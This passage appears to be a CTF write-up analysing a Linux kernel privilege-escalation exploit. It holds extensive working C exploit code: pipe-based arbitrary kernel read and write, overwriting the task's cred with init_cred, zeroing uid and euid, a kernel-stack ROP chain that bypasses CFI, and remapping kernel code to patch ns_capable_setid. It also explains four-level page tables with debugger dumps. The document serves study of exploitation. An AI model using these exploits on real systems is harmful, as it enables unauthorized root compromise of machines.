 * Note that the offset of different field should be referred to your env.
 */
for (int i = 0; 1; i++) {
    arbitrary_read_by_pipe((struct page*) (vmemmap_base + i * 0x40), buf);

    comm_addr = memmem(buf, 0xf00, "arttnba3pwnn", 12);
    if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
        && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
        && (comm_addr[-57] > 0xffff888000000000) /* task->real_parent */
        && (comm_addr[-56] > 0xffff888000000000)) { /* task->parent */

        /* task->real_parent */
        parent_task = comm_addr[-57];

        /* task_struct::ptraced */
        current_task = comm_addr[-50] - 2528;

        /* direct-map address of page i minus i pages: the first page of the direct mapping */
        page_offset_base = (comm_addr[-50]&0xfffffffffffff000) - i * 0x1000;
        page_offset_base &= 0xfffffffff0000000;

        printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
               (struct page*) (vmemmap_base + i * 0x40));
        printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
               page_offset_base);
        printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
               "0x%lx\n\n", current_task);
        break;
    }
}
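The page_offset_base computation above relies on the linear relation between a direct-map address and its struct page. The later code uses a helper called direct_map_addr_to_page_addr whose body is not shown in this post, so the following is only my sketch of what such a conversion could look like. It assumes a flat layout in which struct page number n describes physical page n; the function names here are my own.

```c
#include <stdint.h>

#define PAGE_SZ        0x1000ULL
#define STRUCT_PAGE_SZ 0x40ULL

/* Direct-map virtual address -> address of the struct page describing it. */
uint64_t direct_map_to_page(uint64_t vmemmap_base, uint64_t page_offset_base,
                            uint64_t addr)
{
    uint64_t pfn = ((addr & ~0xfffULL) - page_offset_base) / PAGE_SZ;

    return vmemmap_base + pfn * STRUCT_PAGE_SZ;
}

/* struct page address -> direct-map virtual address of the page it describes. */
uint64_t page_to_direct_map(uint64_t vmemmap_base, uint64_t page_offset_base,
                            uint64_t page)
{
    uint64_t pfn = (page - vmemmap_base) / STRUCT_PAGE_SZ;

    return page_offset_base + pfn * PAGE_SZ;
}
```

With made-up bases, an address 0x9d123 bytes into the direct mapping falls on page 157, which matches the index used for the kernel text leak earlier.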

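Privilege escalation

arttnba3 provides three ways to escalate privileges, two of which are not that common.

Let's go through them one by one.

Modifying cred

The first is the fairly common approach of modifying the task_struct of the current process, usually in one of two forms:

  • set task_struct->cred to &init_cred
  • set task_struct->cred->uid and euid to 0

arttnba3 went with the first one.

The init_cred symbol is sometimes not exported in /proc/kallsyms (in this challenge it is),

so he demonstrates another way to find it: follow the parent pointer in task_struct upward again and again until reaching init_task, the task whose real_parent points to itself. It is the ancestor of every process and runs with root privileges, so its cred is init_cred.

That cred is saved and then used to replace the cred of current_task, which escalates our privileges.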

void privilege_escalation_by_task_overwrite(void)
{
    /* finding the init_task, the final parent of every task */
    puts("[*] Seeking for init_task...");

    for (;;) {
        size_t ptask_page_addr = direct_map_addr_to_page_addr(parent_task);

        tsk_buf = (size_t*) ((size_t) buf + (parent_task & 0xfff));

        arbitrary_read_by_pipe((struct page*) ptask_page_addr, buf);
        arbitrary_read_by_pipe((struct page*) (ptask_page_addr+0x40),&buf[512]);

        /* task_struct::real_parent */
        if (parent_task == tsk_buf[309]) {
            break;
        }

        parent_task = tsk_buf[309];
    }

    init_task = parent_task;
    init_cred = tsk_buf[363];
    init_nsproxy = tsk_buf[377];

    printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
    printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
    printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n",init_nsproxy);

    /* now, changing the current task_struct to get the full root :) */
    puts("[*] Escalating ROOT privilege now...");

    current_task_page = direct_map_addr_to_page_addr(current_task);

    arbitrary_read_by_pipe((struct page*) current_task_page, buf);
    arbitrary_read_by_pipe((struct page*) (current_task_page+0x40), &buf[512]);

    tsk_buf = (size_t*) ((size_t) buf + (current_task & 0xfff));
    tsk_buf[363] = init_cred;
    tsk_buf[364] = init_cred;
    tsk_buf[377] = init_nsproxy;

    arbitrary_write_by_pipe((struct page*) current_task_page, buf, 0xff0);
    arbitrary_write_by_pipe((struct page*) (current_task_page+0x40),
                            &buf[512], 0xff0);

    puts("[+] Done.\n");
    puts("[*] checking for root...");

    get_root_shell();
}

I then implemented the second form myself: set uid and euid to 0 directly, which is the more straightforward idea.

/* cred_page initially holds the direct-map address of the current cred */
printf("0x%lx\n", cred_page);
int offset = cred_page & 0xfff;
cred_page = direct_map_addr_to_page_addr(cred_page);

/* page to write */
evil_2nd_buf.page = (struct page*) cred_page;
/* skip the 4-byte cred->usage counter so that the write starts at cred->uid
 * (layout assumption for this kernel, check it against your own build) */
evil_2nd_buf.offset = offset + 4;
evil_2nd_buf.len = 0;

/* 24 zero bytes cover uid, gid, suid, sgid, euid and egid (6 x 4 bytes) */
char src[24];
memset(src, 0, sizeof(src));
int len = sizeof(src);

/* hijack the 4th pipe pointing to 2nd pipe */
write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* hijack the 2nd pipe for arbitrary write */
write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
      temp_zero_buf,
      TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* hijack the 3rd pipe to point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* write data into dst page */
write(pipe_fd[self_2nd_pipe_pid][1], src, len);
puts("[+] Done.\n");
puts("[*] checking for root...");
get_root_shell();

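Overwriting the kernel stack

Overwriting the kernel stack to run a ROP chain is hardly a rare technique, but the way arttnba3 locates the kernel stack here was new to me.

Let's study it.

Because the struct page array corresponds one-to-one to physical page frames, we can easily convert between a physical address and the address of its struct page. Page tables store physical addresses, so a natural idea is to parse the page tables of the current process to get the physical address of the kernel stack, and from that the struct page of the kernel stack. We can then write a ROP chain directly onto the kernel stack and get arbitrary code execution.

The page table address can be obtained from mm_struct, the mm_struct address from task_struct, and the kernel stack address from task_struct as well, so everything falls into place:

Put simply, we get the page that backs the stack and lay out gadgets on it.

Gadgets on the stack are reached through ret, and CONFIG_CFI_CLANG only checks forward edges (indirect calls), so CFI is bypassed.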

void privilege_escalation_by_rop(void)
{
    size_t rop[0x1000], idx = 0;

    /* resolving some vaddr */
    pgd_vaddr_resolve();

    /* reading the page table directly to get physical addr of kernel stack*/
    puts("[*] Reading page table...");

    stack_addr_another = vaddr_resolve(pgd_addr, stack_addr);
    stack_addr_another &= (~PAGE_ATTR_NX); /* N/X bit */
    stack_addr_another += page_offset_base;

    printf("\033[32m\033[1m[+] Got another virt addr of kernel stack: \033[0m"
           "0x%lx\n\n", stack_addr_another);

    /* construct the ROP */
    for (int i = 0; i < ((0x1000 - 0x100) / 8); i++) {
        rop[idx++] = RET + kernel_offset;
    }

    rop[idx++] = POP_RDI_RET + kernel_offset;
    rop[idx++] = INIT_CRED + kernel_offset;
    rop[idx++] = COMMIT_CREDS + kernel_offset;
    rop[idx++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE +54 + kernel_offset;
    rop[idx++] = *(size_t*) "arttnba3";
    rop[idx++] = *(size_t*) "arttnba3";
    rop[idx++] = (size_t) get_root_shell;
    rop[idx++] = user_cs;
    rop[idx++] = user_rflags;
    rop[idx++] = user_sp;
    rop[idx++] = user_ss;

    stack_page = direct_map_addr_to_page_addr(stack_addr_another);

    puts("[*] Hijacking current task's stack...");

    sleep(5);

    arbitrary_write_by_pipe((struct page*) (stack_page + 0x40 * 3), rop, 0xff0);

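arttnba3 chose to resolve the stack address again as stack_addr_another, but in practice using stack_addr directly works too.

Virtual address translation

Five-level paging is fairly mature by now, but most x86 machines still use four-level page tables.

The four levels are pgd, pud, pmd and pte. Four-level paging uses only 48 bits of the virtual address: 12 bits are the offset within the page, and the remaining 36 bits are split evenly, 9 bits per level.

Four-level page tables are also what you mostly meet in kernel pwn.

The cr3 register holds the physical address of the pgd. Every process has its own page tables, and on a context switch cr3 is loaded from the task_struct->mm->pgd of the incoming process. What mm->pgd stores is not the physical address but the address of the pgd in the direct mapping; subtracting page_offset_base from it gives the physical address.

In general a page table has 512 entries of 8 bytes each, so one table fills exactly one page frame. There is only one pgd table, while each of the other three levels may have many tables.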
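The 9/9/9/9/12 split can be written down directly. This is a small sketch of the index extraction for four-level paging; the function names are my own and the addresses in the usage note are the ones that appear elsewhere in this post.

```c
#include <stdint.h>

/* Each level indexes a 512-entry table with 9 bits of the virtual address. */
unsigned pgd_index(uint64_t va) { return (unsigned)((va >> 39) & 0x1ff); }
unsigned pud_index(uint64_t va) { return (unsigned)((va >> 30) & 0x1ff); }
unsigned pmd_index(uint64_t va) { return (unsigned)((va >> 21) & 0x1ff); }
unsigned pte_index(uint64_t va) { return (unsigned)((va >> 12) & 0x1ff); }

/* The low 12 bits are the offset inside the 4K page. */
unsigned page_offset(uint64_t va) { return (unsigned)(va & 0xfff); }
```

For the user mapping at 0x114514000 used in the USMA part, the indices come out as pgd 0, pud 4, pmd 162 and pte 276. For the default kernel text base 0xffffffff81000000 they are pgd 511, pud 510, pmd 8 and pte 0.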

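The entries of the first three levels (pgd, pud, pmd) have the following layout:

[figure: entry format for pgd, pud and pmd]

The pte entry has the following layout:

[figure: entry format for pte]

A PTE has three permission bits that control access to the page. R/W decides between read-only and read-write; U/S decides whether user mode may access the page; XD disables instruction fetches from the page.

Every time a page is accessed, the MMU sets the A bit, called the reference bit. The kernel can use it to implement its page replacement algorithm.

Every time a page is written, the MMU sets the D bit, called the dirty bit. It tells the kernel whether the victim page has to be written back before it is replaced.

The kernel can clear the reference bit or the dirty bit by executing a special kernel-mode instruction.

Note in particular: a pmd entry may have the PS bit set. That means there is no fourth-level pte table; the physical base address in the pmd entry designates a huge page directly, and the low 21 bits of the virtual address are the offset into it. The figure labels this as a 4M page, but since only 21 bits are left it is really a 2M page, and in the kernel page tables the physical base addresses of such entries do increase in 2M steps.

Huge-page pmd entries (base address increases in 2M steps):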

pwndbg> telescope 0xffff9480c0000000+0xa202000+22*8
00:0000│ 0xffff9480ca2020b0 ◂— 0x8000000002c000e3
01:0008│ 0xffff9480ca2020b8 ◂— 0x2e29063
02:0010│ 0xffff9480ca2020c0 ◂— 0x80000000030000e3
03:0018│ 0xffff9480ca2020c8 ◂— 0x80000000032000e3
04:0020│ 0xffff9480ca2020d0 ◂— 0x80000000034000e3
05:0028│ 0xffff9480ca2020d8 ◂— 0x80000000036000e3
06:0030│ 0xffff9480ca2020e0 ◂— 0x80000000038000e3
07:0038│ 0xffff9480ca2020e8 ◂— 0x8000000003a000e3

Entries for 4K pages (base address increases in 4K steps):

pwndbg> telescope 0xffff9480c0000000+0x2a4f000+268*8
00:0000│ 0xffff9480c2a4f860 ◂— 0x8000000002d70063 /* 'c' */
01:0008│ 0xffff9480c2a4f868 ◂— 0x8000000002d71063
02:0010│ 0xffff9480c2a4f870 ◂— 0x8000000002d72063
03:0018│ 0xffff9480c2a4f878 ◂— 0x8000000002d73063
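The values in the two dumps above can be decoded with a few bit masks. The sketch below uses the standard x86-64 bit positions; the macro and function names are my own. Note that bit 7 only means PS in pud/pmd entries (in a leaf pte the same bit has a different meaning), and that the address mask ignores the PAT bit of huge-page entries for simplicity.

```c
#include <stdbool.h>
#include <stdint.h>

#define ENTRY_PRESENT   (1ULL << 0)
#define ENTRY_RW        (1ULL << 1)
#define ENTRY_USER      (1ULL << 2)
#define ENTRY_PS        (1ULL << 7)   /* huge page, valid for pud/pmd entries */
#define ENTRY_NX        (1ULL << 63)
#define ENTRY_ADDR_MASK 0x000ffffffffff000ULL

/* True if a pmd entry maps a 2M page directly instead of pointing to a pte table. */
bool entry_is_huge(uint64_t e) { return (e & ENTRY_PS) != 0; }

/* True if instruction fetches from the mapping are disabled. */
bool entry_is_nx(uint64_t e) { return (e & ENTRY_NX) != 0; }

/* Physical address stored in the entry (next table or mapped page). */
uint64_t entry_phys(uint64_t e) { return e & ENTRY_ADDR_MASK; }
```

Applied to the first dump, 0x8000000002c000e3 is a non-executable huge page at physical 0x2c00000, while its neighbour 0x2e29063 has PS clear and points to a pte table at 0x2e29000, so that 2M region is mapped with 4K pages.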

USMA

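Resolve the physical address paddr of the target kernel code.

In user space, mmap a range of virtual addresses vaddr, then overwrite the pte entries for vaddr so that they map paddr.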

void privilege_escalation_by_usma(void)
{
    #define NS_CAPABLE_SETID 0xffffffff810fd2a0

    char *kcode_map, *kcode_func;
    size_t dst_paddr, dst_vaddr, *rop, idx = 0;

    /* resolving some vaddr */
    pgd_vaddr_resolve();

    kcode_map = mmap((void*) 0x114514000, 0x2000, PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    /* mmap() reports failure with MAP_FAILED, not NULL */
    if (kcode_map == MAP_FAILED) {
        err_exit("FAILED to create mmap area!");
    }

    /* because of lazy allocation, we need to write it manually */
    for (int i = 0; i < 8; i++) {
        kcode_map[i] = "arttnba3"[i];
        kcode_map[i + 0x1000] = "arttnba3"[i];
    }

    /* overwrite kernel code seg to exec shellcode directly :) */
    dst_vaddr = NS_CAPABLE_SETID + kernel_offset;
    printf("\033[34m\033[1m[*] vaddr of ns_capable_setid is: \033[0m0x%lx\n",
           dst_vaddr);

    dst_paddr = vaddr_resolve_for_3_level(pgd_addr, dst_vaddr);
    dst_paddr += 0x1000 * PTE_ENTRY(dst_vaddr);

    printf("\033[32m\033[1m[+] Got ns_capable_setid's phys addr: \033[0m"
           "0x%lx\n\n", dst_paddr);

    /* remapping to our mmap area */
    vaddr_remapping(pgd_addr, 0x114514000, dst_paddr);
    vaddr_remapping(pgd_addr, 0x114514000 + 0x1000, dst_paddr + 0x1000);

    /* overwrite kernel code segment directly */

    puts("[*] Start overwriting kernel code segment...");

    /**
     * The setresuid() check for user's permission by ns_capable_setid(),
     * so we can just patch it to let it always return true :)
     */
    memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40); /* nop */
    memcpy(kcode_map + (NS_CAPABLE_SETID & 0xfff) + 0x40,
           "\xf3\x0f\x1e\xfa" /* endbr64 */
           "H\xc7\xc0\x01\x00\x00\x00" /* mov rax, 1 */
           "\xc3", /* ret */
           12);

    /* get root now :) */
    puts("[*] trigger evil ns_capable_setid() in setresuid()...\n");

    sleep(5);

    setresuid(0, 0, 0);
    get_root_shell();
}

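ns_capable_setid is the function that checks whether the caller has permission during setresuid.

We patch it so that it always returns 1, i.e. the caller is always allowed to set arbitrary ids.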